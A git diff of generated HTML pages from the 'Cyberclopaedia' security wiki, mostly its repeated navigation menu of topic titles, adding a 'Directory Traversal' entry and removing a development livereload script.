      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -221,22 +221,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Plaintext Attack (CPA).html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Plaintext Attack (CPA).html index d97b1ac7..76f082e9 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Plaintext Attack (CPA).html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Chosen Plaintext Attack (CPA).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -285,22 +285,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext Integrity (CI).html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext Integrity (CI).html index a51e79af..480cc5d2 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext Integrity (CI).html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext Integrity (CI).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
